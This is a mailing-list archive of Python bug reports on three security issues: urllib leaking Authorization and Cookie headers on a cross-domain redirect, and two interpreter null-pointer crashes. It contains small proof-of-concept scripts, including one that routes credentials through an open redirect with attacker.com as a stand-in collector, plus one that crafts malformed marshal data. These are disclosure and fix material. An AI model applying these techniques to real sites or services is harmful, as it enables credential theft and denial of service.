[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov added the comment: If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly discuss that all headers should be sent. I wish it did :) I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure). Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it https://tools.ietf.org/html/rfc6265#section-5.4 curl was recently updated to filter out Authorization headers in case of a redirect to another host. Chrome and Firefox don't sent either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :) -- ___ Python tracker <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov <artem.smotra...@gmail.com> added the comment: Hi Ivan, Yes, unfortunately specs don't say anything about this scenario. > once you have given your credentials to a server, it is free to do whatever > it wants with them. I hope servers don't share this opinion :) > So, your proposed filtering does not actually achieve anything meaningful.1 I am sorry that I couldn't convice you. Thank you for your reply! -- ___ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
New submission from Artem Smotrakov <artem.smotra...@gmail.com>: After discussing it on secur...@python.org, it was decided to disclose it. Here is the original report: Hello Python Security Team, Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects. Let's consider the following environment: - http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme - http://httpleak.gypsyengineer.com/redirect.php?url= is an open redirect which returns 301 code, and redirects a client to the specified URL - http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent Let's then consider the following scenario: - create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com' - call urllib.request.Request.add_header() method to set Authorization and Cookie headers - call urllib.request.urlopen() method to open a connection Here is what happens next: - urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected - redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains) - urllib processes 301 code and makes a request to http://headers.gypsyengineer.com The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well. Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. As a result, the attacker can imporsonate the user on the original web site. Here is a simple POC which shows the problem: import urllib.request req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com') req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==') req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com'); with urllib.request.urlopen(req) as f: print(f.read(2048).decode("utf-8")) Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers which are supposed to be sent only to httpleak.gypsyengineer.com: Hello, I am headers.gypsyengineer.com Here are HTTP headers you just sent me: Accept-Encoding: identity User-Agent: Python-urllib/3.8 Authorization: Basic YWRtaW46dGVzdA== Cookie: This is only for httpleak.gypsyengineer.com Host: headers.gypsyengineer.com Cache-Control: max-age=259200 Connection: keep-alive I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects. Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks! Artem -- components: Library (Lib) messages: 317793 nosy: alex, artem.smotrakov priority: normal severity: normal status: open title: urllib may leak sensitive HTTP headers to a third-party web site type: security versions: Python 3.5 ___ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
Changes by Artem Smotrakov <artem.smotra...@gmail.com>: -- keywords: +patch Added file: http://bugs.python.org/file46723/_struct_cache.patch ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue29802> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
New submission from Artem Smotrakov: Attached struct_unpack_crash.py results to a null-pointer dereference in s_unpack_internal() function of _struct module: ASAN:SIGSEGV = ==20245==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x7facd2cea83a bp 0x sp 0x7ffd0250f860 T0) #0 0x7facd2cea839 in s_unpack_internal /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 #1 0x7facd2ceab69 in Struct_unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1570 #2 0x7facd2ceab69 in unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:2192 #3 0x7facd2ceab69 in unpack /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:215 #4 0x474397 in _PyMethodDef_RawFastCallKeywords Objects/call.c:618 #5 0x474397 in _PyCFunction_FastCallKeywords Objects/call.c:690 #6 0x42685f in call_function Python/ceval.c:4817 #7 0x42685f in _PyEval_EvalFrameDefault Python/ceval.c:3298 #8 0x54b164 in PyEval_EvalFrameEx Python/ceval.c:663 #9 0x54b164 in _PyEval_EvalCodeWithName Python/ceval.c:4173 #10 0x54b252 in PyEval_EvalCodeEx Python/ceval.c:4200 #11 0x54b252 in PyEval_EvalCode Python/ceval.c:640 #12 0x431e0e in run_mod Python/pythonrun.c:976 #13 0x431e0e in PyRun_FileExFlags Python/pythonrun.c:929 #14 0x43203b in PyRun_SimpleFileExFlags Python/pythonrun.c:392 #15 0x446354 in run_file Modules/main.c:338 #16 0x446354 in Py_Main Modules/main.c:809 #17 0x41df71 in main Programs/python.c:69 #18 0x7facd58ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x428728 in _start (/home/artem/projects/python/build/cpython-asan/bin/python3.7+0x428728) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 s_unpack_internal ==20245==ABORTING Looks like _struct implementation assumes that PyStructObject->s_codes cannot be null, but it may happen if a bytearray was passed to unpack(). PyStructObject->s_codes becomes null in a couple of places in _struct.c, but that's not the case. unpack() calls _PyArg_ParseStack() with cache_struct_converter() which maintains a cache. Even if unpack() was called incorrectly with a string as second parameter (see below), this value is going to be cached anyway. Next time, if the same format string is used, the value is going to be retrieved from the cache. But PyStructObject->s_codes is still not null in cache_struct_converter() function. If you watch "s_object" under gdb, you can see that "s_codes" becomes null here: PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647 647 view->format = NULL; (gdb) bt #0 PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647 #1 0x0046020c in bytearray_getbuffer (obj=0x77e50730, view=, flags=) at Objects/bytearrayobject.c:72 #2 0x00560b0a in getbuffer (errmsg=, view=0x7fffd700, arg=0x77e50730) at Python/getargs.c:1380 #3 convertsimple (freelist=0x7fffd3b0, bufsize=256, msgbuf=0x7fffd4c0 "must be bytes-like object, not str", flags=2, p_va=0x0, p_format=, arg=0x77e50730) at Python/getargs.c:938 #4 convertitem (arg=0x77e50730, p_format=p_format@entry=0x7fffd3a8, p_va=p_va@entry=0x7fffd610, flags=flags@entry=2, levels=levels@entry=0x7fffd3c0, msgbuf=msgbuf@entry=0x7fffd4c0 "must be bytes-like object, not str", bufsize=256, freelist=0x7fffd3b0) at Python/getargs.c:596 #5 0x00561d6f in vgetargs1_impl (compat_args=compat_args@entry=0x0, stack=stack@entry=0x6164b520, nargs=2, format=format@entry=0x735d5c88 "O*:unpack", p_va=p_va@entry=0x7fffd610, flags=flags@entry=2) at Python/getargs.c:388 #6 0x005639b0 in _PyArg_ParseStack_SizeT ( args=args@entry=0x6164b520, nargs=, format=format@entry=0x735d5c88 "O*:unpack") at Python/getargs.c:163 #7 0x735d2df8 in unpack (module=module@entry=0x77e523b8, args=args@entry=0x6164b520, nargs=, kwnames=kwnames@entry=0x0) at /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:207 #8 0x00474398 in _PyMethodDef_RawFastCallKeywords (kwnames=0x0, nargs=140737352377272, args=0x6164b520, self=0x77e523b8, method=0x737d94e0 <module_functions+160>) at Objects/call.c:618 #9 _PyCFunction_FastCallKeywords (func=func@entry=0x77e53828, args=args@entry=0x6164b520, nargs=nargs@entry=2, kwnames=kwnames@en
[issue27826] Null-pointer dereference in tuplehash() function
Changes by Artem Smotrakov <artem.smotra...@gmail.com>: -- keywords: +patch Added file: http://bugs.python.org/file44184/tuplehash.patch ___ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue27826> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue27826] Null-pointer dereference in tuplehash() function
New submission from Artem Smotrakov: A null-pointer dereference may happen while deserialization incorrect data with marshal.loads() function. Here is a test which reproduces this (see also attached marshal_tuplehash_null_dereference.py): import marshal value = ( # tuple1 "this is a string", #string1 [ 1, # int1 2, # int2 3, # int3 4 # int4 ], ( #tuple2 "more tuples", #string2 1.0,# float1 2.3,# float2 4.5 # float3 ), "this is yet another string" ) dump = marshal.dumps(value) data = bytearray(dump) data[10] = 40 data[4] = 16 data[103] = 143 data[97] = 245 data[78] = 114 data[35] = 188 marshal.loads(bytes(data)) This code modifies the serialized data with the following: - update type of 'int2' element to TYPE_SET, 'int3' element becomes a length of the set - update 'float3' element to TYPE_REF which points to tuple1 Here is a stack trace reported by ASan: ASAN:SIGSEGV = ==20296==ERROR: AddressSanitizer: SEGV on unknown address 0x0008 (pc 0x00582064 bp 0x7ffc9e581310 sp 0x7ffc9e5812f0 T0) #0 0x582063 in PyObject_Hash Objects/object.c:769 #1 0x5a3662 in tuplehash Objects/tupleobject.c:358 #2 0x5820ae in PyObject_Hash Objects/object.c:771 #3 0x5a3662 in tuplehash Objects/tupleobject.c:358 #4 0x5820ae in PyObject_Hash Objects/object.c:771 #5 0x58fac8 in set_add_key Objects/setobject.c:422 #6 0x59a85c in PySet_Add Objects/setobject.c:2323 #7 0x760d9d in r_object Python/marshal.c:1310 #8 0x76029d in r_object Python/marshal.c:1223 #9 0x760015 in r_object Python/marshal.c:1195 #10 0x7621dc in read_object Python/marshal.c:1465 #11 0x7639be in marshal_loads Python/marshal.c:1767 #12 0x577ff3 in PyCFunction_Call Objects/methodobject.c:109 #13 0x708a05 in call_function Python/ceval.c:4744 #14 0x6fb5a7 in PyEval_EvalFrameEx Python/ceval.c:3256 #15 0x70276f in _PyEval_EvalCodeWithName Python/ceval.c:4050 #16 0x70299f in PyEval_EvalCodeEx Python/ceval.c:4071 #17 0x6e07d7 in PyEval_EvalCode Python/ceval.c:778 #18 0x432354 in run_mod Python/pythonrun.c:980 #19 0x431e5b in PyRun_FileExFlags Python/pythonrun.c:933 #20 0x42e929 in PyRun_SimpleFileExFlags Python/pythonrun.c:396 #21 0x42caba in PyRun_AnyFileExFlags Python/pythonrun.c:80 #22 0x45f995 in run_file Modules/main.c:319 #23 0x4619c8 in Py_Main Modules/main.c:777 #24 0x41d258 in main Programs/python.c:69 #25 0x7f374629babf in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20abf) #26 0x41ce28 in _start AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV Objects/object.c:769 PyObject_Hash ==20296==ABORTING What happens when it tries to read int2 element: - int2 element is now a set of length 3 - add int4 element to the set - add tuple2 element -- when it adds an element to a set, it calculates a hash of the element -- when it calculates a hash of a tuple, it calculates hashes of all elements of the tuple -- while calculating a hash of tuple2, it calculates a hash of tuple1 since #float3 now is a TYPE_REF which points to tuple1 -- but tuple1 is not complete yet: length of tuple1 is 4, but only string1 was added to it -- tuplehash() function reads a length of a tuple, and then calls PyObject_Hash() for each element -- but it doesn't check if all elements were added to the tuple -- as a result, a null-pointer dereference happens in tuplehash() while reading second element of tuple1 https://hg.python.org/cpython/file/tip/Objects/tupleobject.c#l347 ... static Py_hash_t tuplehash(PyTupleObject *v) { Py_uhash_t x; /* Unsigned for defined overflow behavior. */ Py_hash_t y; Py_ssize_t len = Py_SIZE(v);<= for tuple1 it returns 4, but tuple1 contains only one element (string1) PyObject **p; Py_uhash_t mult = _PyHASH_MULTIPLIER; x = 0x345678UL; p = v->ob_item; while (--len >= 0) { y = PyObject_Hash(*p++);<= null-pointer dereference happens here while reading second element ... I could reproduce it with python3.5, and latest build of https://hg.python.org/cpython (Aug 20th, 2016). Here is a simple patch which updates tuplehash() to check "p" for null: diff -r 6e6aa2054824 Objects/tupleobject.c --- a/Objects/tupleobject.c Sat Aug 20 21:22:03 2016 +0300 +++ b/Objects/tupleobject.c Sat Aug 20 23:17:16 2016 -0700 @@ -355,7 +355,13 @@ x = 0x345678UL; p = v->ob_item; while (--len >= 0) { -y = PyObject_Hash(*p++); +PyObject *next = *p++; +if (next == NULL) { +PyErr_SetString(PyExc_TypeError, +"Cannot compute a hash, tuple seems to be invalid"); +return -1; +} +y = PyObject_Hash(next); if (y == -1) return -1;